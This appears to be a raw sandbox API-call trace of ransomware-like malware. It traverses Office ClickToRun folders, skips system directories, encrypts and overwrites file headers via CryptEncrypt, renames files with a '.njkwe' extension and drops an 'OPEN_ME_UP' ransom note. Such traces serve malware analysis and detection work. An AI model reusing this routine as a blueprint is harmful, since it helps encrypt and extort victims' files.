lstrcmpiW (lpString1="en-us.16", lpString2="Windows") returned -1 [0069.699] lstrcmpiW (lpString1="en-us.16", lpString2="$Recycle.bin") returned 1 [0069.699] lstrcmpiW (lpString1="en-us.16", lpString2="System Volume Information") returned -1 [0069.699] lstrcmpiW (lpString1="en-us.16", lpString2="Program Files") returned -1 [0069.699] lstrcmpiW (lpString1="en-us.16", lpString2="Program Files (x86)") returned -1 [0069.699] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\A6A87302-92AE-41F2-AC52-73F5EE18259F\\en-us.16") returned 101 [0069.699] lstrcmpW (lpString1="en-us.16", lpString2=".") returned 1 [0069.699] lstrcmpW (lpString1="en-us.16", lpString2="..") returned 1 [0069.699] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\A6A87302-92AE-41F2-AC52-73F5EE18259F\\en-us.16", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0069.699] GetProcessHeap () returned 0xbe0000 [0069.699] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc36140 [0069.699] wnsprintfW (in: pszDest=0xc36140, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\A6A87302-92AE-41F2-AC52-73F5EE18259F\\en-us.16\\*") returned 103 [0069.699] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\A6A87302-92AE-41F2-AC52-73F5EE18259F\\en-us.16\\*", lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x110186f1, ftCreationTime.dwHighDateTime=0x1d327ce, ftLastAccessTime.dwLowDateTime=0x66b4e849, ftLastAccessTime.dwHighDateTime=0x1d327ce, ftLastWriteTime.dwLowDateTime=0x66b4e849, ftLastWriteTime.dwHighDateTime=0x1d327ce, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a1a0 [0069.708] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0069.708] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0069.708] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0069.708] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0069.708] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0069.708] wnsprintfW (in: pszDest=0xc36140, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\A6A87302-92AE-41F2-AC52-73F5EE18259F\\en-us.16\\.") returned 103 [0069.708] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0069.708] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x110186f1, ftCreationTime.dwHighDateTime=0x1d327ce, ftLastAccessTime.dwLowDateTime=0x66b4e849, ftLastAccessTime.dwHighDateTime=0x1d327ce, ftLastWriteTime.dwLowDateTime=0x66b4e849, ftLastWriteTime.dwHighDateTime=0x1d327ce, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0069.708] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0069.708] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0069.708] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0069.708] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0069.708] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0069.708] wnsprintfW (in: pszDest=0xc36140, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\A6A87302-92AE-41F2-AC52-73F5EE18259F\\en-us.16\\..") returned 104 [0069.708] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0069.708] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0069.708] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x113f8423, ftCreationTime.dwHighDateTime=0x1d327ce, ftLastAccessTime.dwLowDateTime=0x113f8423, ftLastAccessTime.dwHighDateTime=0x1d327ce, ftLastWriteTime.dwLowDateTime=0x8f27c900, ftLastWriteTime.dwHighDateTime=0x1d32053, nFileSizeHigh=0x0, nFileSizeLow=0x108693, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="stream.x86.en-us.man.dat", cAlternateFileName="STREAM~1.DAT")) returned 1 [0069.708] lstrcmpiW (lpString1="stream.x86.en-us.man.dat", lpString2="Windows") returned -1 [0069.708] lstrcmpiW (lpString1="stream.x86.en-us.man.dat", lpString2="$Recycle.bin") returned 1 [0069.708] lstrcmpiW (lpString1="stream.x86.en-us.man.dat", lpString2="System Volume Information") returned -1 [0069.708] lstrcmpiW (lpString1="stream.x86.en-us.man.dat", lpString2="Program Files") returned 1 [0069.708] lstrcmpiW (lpString1="stream.x86.en-us.man.dat", lpString2="Program Files (x86)") returned 1 [0069.708] wnsprintfW (in: pszDest=0xc36140, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\A6A87302-92AE-41F2-AC52-73F5EE18259F\\en-us.16\\stream.x86.en-us.man.dat") returned 126 [0069.708] StrStrIW (lpFirst="stream.x86.en-us.man.dat", lpSrch=".njkwe") returned 0x0 [0069.709] lstrcmpW (lpString1="stream.x86.en-us.man.dat", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0069.709] lstrcmpW (lpString1="stream.x86.en-us.man.dat", lpString2="taridd") returned -1 [0069.709] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\A6A87302-92AE-41F2-AC52-73F5EE18259F\\en-us.16\\strea", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0069.709] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\A6A87302-92AE-41F2-AC52-73F5EE18259F\\en-us.16\\stream.x86.en-us.man.dat" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\a6a87302-92ae-41f2-ac52-73f5ee18259f\\en-us.16\\stream.x86.en-us.man.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0069.725] GetTickCount () returned 0x1151cfa [0069.725] GetTickCount () returned 0x1151cfa [0069.726] GetTickCount () returned 0x1151cfa [0069.726] GetTickCount () returned 0x1151cfa [0069.726] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0069.726] GetProcessHeap () returned 0xbe0000 [0069.726] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4c840 [0069.726] ReadFile (in: hFile=0x43c, lpBuffer=0xc4c840, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc4c840*, lpNumberOfBytesRead=0x380edc4*=0x2800, lpOverlapped=0x0) returned 1 [0069.728] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0069.729] WriteFile (in: hFile=0x43c, lpBuffer=0xc4c840*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc4c840*, lpNumberOfBytesWritten=0x380edc4*=0x2800, lpOverlapped=0x0) returned 1 [0069.729] GetProcessHeap () returned 0xbe0000 [0069.729] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4c840 | out: hHeap=0xbe0000) returned 1 [0069.729] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0069.730] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0069.732] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0069.732] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0069.732] CloseHandle (hObject=0x43c) returned 1 [0069.733] GetProcessHeap () returned 0xbe0000 [0069.733] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc46ed8 [0069.733] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\A6A87302-92AE-41F2-AC52-73F5EE18259F\\en-us.16\\stream.x86.en-us.man.dat_r00t_{3sXlE5}.njkwe") returned 146 [0069.733] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\A6A87302-92AE-41F2-AC52-73F5EE18259F\\en-us.16\\stream.x86.en-us.man.dat" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\a6a87302-92ae-41f2-ac52-73f5ee18259f\\en-us.16\\stream.x86.en-us.man.dat"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\A6A87302-92AE-41F2-AC52-73F5EE18259F\\en-us.16\\stream.x86.en-us.man.dat_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\a6a87302-92ae-41f2-ac52-73f5ee18259f\\en-us.16\\stream.x86.en-us.man.dat_r00t_{3sxle5}.njkwe")) returned 1 [0069.734] GetProcessHeap () returned 0xbe0000 [0069.734] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc46ed8 | out: hHeap=0xbe0000) returned 1 [0069.734] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x113f8423, ftCreationTime.dwHighDateTime=0x1d327ce, ftLastAccessTime.dwLowDateTime=0x113f8423, ftLastAccessTime.dwHighDateTime=0x1d327ce, ftLastWriteTime.dwLowDateTime=0x8f27c900, ftLastWriteTime.dwHighDateTime=0x1d32053, nFileSizeHigh=0x0, nFileSizeLow=0x108693, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="stream.x86.en-us.man.dat", cAlternateFileName="STREAM~1.DAT")) returned 0 [0069.734] FindClose (in: hFindFile=0xc1a1a0 | out: hFindFile=0xc1a1a0) returned 1 [0069.734] wnsprintfW (in: pszDest=0xc36140, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\A6A87302-92AE-41F2-AC52-73F5EE18259F\\en-us.16\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 133 [0069.734] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\A6A87302-92AE-41F2-AC52-73F5EE18259F\\en-us.16\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\a6a87302-92ae-41f2-ac52-73f5ee18259f\\en-us.16\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0069.734] WriteFile (in: hFile=0x438, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380edcc, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380edcc*=0x351, lpOverlapped=0x0) returned 1 [0069.735] CloseHandle (hObject=0x438) returned 1 [0069.735] GetProcessHeap () returned 0xbe0000 [0069.735] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc36140 | out: hHeap=0xbe0000) returned 1 [0069.735] FindNextFileW (in: hFindFile=0xc1a120, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x106db4bf, ftCreationTime.dwHighDateTime=0x1d327ce, ftLastAccessTime.dwLowDateTime=0x66b4e849, ftLastAccessTime.dwHighDateTime=0x1d327ce, ftLastWriteTime.dwLowDateTime=0x66b4e849, ftLastWriteTime.dwHighDateTime=0x1d327ce, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="x-none.16", cAlternateFileName="")) returned 1 [0069.735] lstrcmpiW (lpString1="x-none.16", lpString2="Windows") returned 1 [0069.735] lstrcmpiW (lpString1="x-none.16", lpString2="$Recycle.bin") returned 1 [0069.735] lstrcmpiW (lpString1="x-none.16", lpString2="System Volume Information") returned 1 [0069.735] lstrcmpiW (lpString1="x-none.16", lpString2="Program Files") returned 1 [0069.736] lstrcmpiW (lpString1="x-none.16", lpString2="Program Files (x86)") returned 1 [0069.736] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\A6A87302-92AE-41F2-AC52-73F5EE18259F\\x-none.16") returned 102 [0069.736] lstrcmpW (lpString1="x-none.16", lpString2=".") returned 1 [0069.736] lstrcmpW (lpString1="x-none.16", lpString2="..") returned 1 [0069.736] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\A6A87302-92AE-41F2-AC52-73F5EE18259F\\x-none.16", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0069.736] GetProcessHeap () returned 0xbe0000 [0069.736] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc36140 [0069.736] wnsprintfW (in: pszDest=0xc36140, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\A6A87302-92AE-41F2-AC52-73F5EE18259F\\x-none.16\\*") returned 104 [0069.736] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\A6A87302-92AE-41F2-AC52-73F5EE18259F\\x-none.16\\*", lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x106db4bf, ftCreationTime.dwHighDateTime=0x1d327ce, ftLastAccessTime.dwLowDateTime=0x66b4e849, ftLastAccessTime.dwHighDateTime=0x1d327ce, ftLastWriteTime.dwLowDateTime=0x66b4e849, ftLastWriteTime.dwHighDateTime=0x1d327ce, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a060 [0069.737] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0069.737] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0069.737] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0069.737] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0069.737] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0069.738] wnsprintfW (in: pszDest=0xc36140, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\A6A87302-92AE-41F2-AC52-73F5EE18259F\\x-none.16\\.") returned 104 [0069.738] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0069.738] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x106db4bf, ftCreationTime.dwHighDateTime=0x1d327ce, ftLastAccessTime.dwLowDateTime=0x66b4e849, ftLastAccessTime.dwHighDateTime=0x1d327ce, ftLastWriteTime.dwLowDateTime=0x66b4e849, ftLastWriteTime.dwHighDateTime=0x1d327ce, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0069.738] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0069.738] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0069.738] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0069.738] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0069.738] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0069.738] wnsprintfW (in: pszDest=0xc36140, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\A6A87302-92AE-41F2-AC52-73F5EE18259F\\x-none.16\\..") returned 105 [0069.738] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0069.738] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0069.738] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x10ff2492, ftCreationTime.dwHighDateTime=0x1d327ce, ftLastAccessTime.dwLowDateTime=0x10ff2492, ftLastAccessTime.dwHighDateTime=0x1d327ce, ftLastWriteTime.dwLowDateTime=0x447ce00, ftLastWriteTime.dwHighDateTime=0x1d32055, nFileSizeHigh=0x0, nFileSizeLow=0x460b47, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="stream.x86.x-none.man.dat", cAlternateFileName="STREAM~1.DAT")) returned 1 [0069.738] lstrcmpiW (lpString1="stream.x86.x-none.man.dat", lpString2="Windows") returned -1 [0069.738] lstrcmpiW (lpString1="stream.x86.x-none.man.dat", lpString2="$Recycle.bin") returned 1 [0069.738] lstrcmpiW (lpString1="stream.x86.x-none.man.dat", lpString2="System Volume Information") returned -1 [0069.738] lstrcmpiW (lpString1="stream.x86.x-none.man.dat", lpString2="Program Files") returned 1 [0069.738] lstrcmpiW (lpString1="stream.x86.x-none.man.dat", lpString2="Program Files (x86)") returned 1 [0069.738] wnsprintfW (in: pszDest=0xc36140, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\A6A87302-92AE-41F2-AC52-73F5EE18259F\\x-none.16\\stream.x86.x-none.man.dat") returned 128 [0069.738] StrStrIW (lpFirst="stream.x86.x-none.man.dat", lpSrch=".njkwe") returned 0x0 [0069.738] lstrcmpW (lpString1="stream.x86.x-none.man.dat", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0069.738] lstrcmpW (lpString1="stream.x86.x-none.man.dat", lpString2="taridd") returned -1 [0069.738] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\A6A87302-92AE-41F2-AC52-73F5EE18259F\\x-none.16\\stre", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0069.738] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\A6A87302-92AE-41F2-AC52-73F5EE18259F\\x-none.16\\stream.x86.x-none.man.dat" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\a6a87302-92ae-41f2-ac52-73f5ee18259f\\x-none.16\\stream.x86.x-none.man.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0069.739] GetTickCount () returned 0x1151cfa [0069.739] GetTickCount () returned 0x1151cfa [0069.739] GetTickCount () returned 0x1151cfa [0069.739] GetTickCount () returned 0x1151cfa [0069.739] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0069.739] GetProcessHeap () returned 0xbe0000 [0069.739] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4c840 [0069.739] ReadFile (in: hFile=0x43c, lpBuffer=0xc4c840, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc4c840*, lpNumberOfBytesRead=0x380edc4*=0x2800, lpOverlapped=0x0) returned 1 [0069.742] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0069.742] WriteFile (in: hFile=0x43c, lpBuffer=0xc4c840*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc4c840*, lpNumberOfBytesWritten=0x380edc4*=0x2800, lpOverlapped=0x0) returned 1 [0069.742] GetProcessHeap () returned 0xbe0000 [0069.742] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4c840 | out: hHeap=0xbe0000) returned 1 [0069.742] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0069.742] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0069.744] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0069.744] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0069.745] CloseHandle (hObject=0x43c) returned 1 [0069.745] GetProcessHeap () returned 0xbe0000 [0069.745] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc46ed8 [0069.745] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\A6A87302-92AE-41F2-AC52-73F5EE18259F\\x-none.16\\stream.x86.x-none.man.dat_r00t_{3sXlE5}.njkwe") returned 148 [0069.745] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\A6A87302-92AE-41F2-AC52-73F5EE18259F\\x-none.16\\stream.x86.x-none.man.dat" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\a6a87302-92ae-41f2-ac52-73f5ee18259f\\x-none.16\\stream.x86.x-none.man.dat"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\A6A87302-92AE-41F2-AC52-73F5EE18259F\\x-none.16\\stream.x86.x-none.man.dat_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\a6a87302-92ae-41f2-ac52-73f5ee18259f\\x-none.16\\stream.x86.x-none.man.dat_r00t_{3sxle5}.njkwe")) returned 1 [0069.748] GetProcessHeap () returned 0xbe0000 [0069.748] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc46ed8 | out: hHeap=0xbe0000) returned 1 [0069.748] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x10ff2492, ftCreationTime.dwHighDateTime=0x1d327ce, ftLastAccessTime.dwLowDateTime=0x10ff2492, ftLastAccessTime.dwHighDateTime=0x1d327ce, ftLastWriteTime.dwLowDateTime=0x447ce00, ftLastWriteTime.dwHighDateTime=0x1d32055, nFileSizeHigh=0x0, nFileSizeLow=0x460b47, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="stream.x86.x-none.man.dat", cAlternateFileName="STREAM~1.DAT")) returned 0 [0069.748] FindClose (in: hFindFile=0xc1a060 | out: hFindFile=0xc1a060) returned 1 [0069.748] wnsprintfW (in: pszDest=0xc36140, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\A6A87302-92AE-41F2-AC52-73F5EE18259F\\x-none.16\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 134 [0069.748] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\A6A87302-92AE-41F2-AC52-73F5EE18259F\\x-none.16\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\a6a87302-92ae-41f2-ac52-73f5ee18259f\\x-none.16\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0069.749] WriteFile (in: hFile=0x438, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380edcc, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380edcc*=0x351, lpOverlapped=0x0) returned 1 [0069.749] CloseHandle (hObject=0x438) returned 1 [0069.749] GetProcessHeap () returned 0xbe0000 [0069.749] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc36140 | out: hHeap=0xbe0000) returned 1 [0069.750] FindNextFileW (in: hFindFile=0xc1a120, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x106db4bf, ftCreationTime.dwHighDateTime=0x1d327ce, ftLastAccessTime.dwLowDateTime=0x66b4e849, ftLastAccessTime.dwHighDateTime=0x1d327ce, ftLastWriteTime.dwLowDateTime=0x66b4e849, ftLastWriteTime.dwHighDateTime=0x1d327ce, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="x-none.16", cAlternateFileName="")) returned 0 [0069.750] FindClose (in: hFindFile=0xc1a120 | out: hFindFile=0xc1a120) returned 1 [0069.750] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\A6A87302-92AE-41F2-AC52-73F5EE18259F\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 124 [0069.750] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\A6A87302-92AE-41F2-AC52-73F5EE18259F\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\a6a87302-92ae-41f2-ac52-73f5ee18259f\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0069.750] WriteFile (in: hFile=0x434, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f054, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f054*=0x351, lpOverlapped=0x0) returned 1 [0069.751] CloseHandle (hObject=0x434) 